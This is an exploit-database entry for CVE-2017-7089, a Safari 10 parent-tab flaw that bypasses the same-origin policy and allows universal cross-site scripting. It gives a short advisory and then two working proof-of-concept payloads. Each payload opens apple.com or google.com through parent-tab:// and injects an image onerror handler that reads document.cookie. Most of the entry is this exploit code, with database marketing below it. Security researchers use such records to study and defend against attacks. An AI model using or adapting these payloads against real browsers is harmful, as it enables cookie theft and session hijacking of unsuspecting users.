Lucene search
K

Safari 10 Local SOP bypass Vulnerability

🗓️ 05 Oct 2017 00:00:00Reported by Bo0oMType 
zdt
 zdt
🔗 0day.today👁 87 Views

Safari 10 Local SOP bypass Vulnerability CVE-2017-7089. Processing malicious web content can lead to universal cross site scripting. Logic issue in parent-tab handling addressed with improved state management

Related
Code
Safari 10 Local SOP bypass Vulnerability

CVE-2017-7089

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.
Safari 10
Local SOP bypass

<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>

Exploit by Frans Rosén

data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>

#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation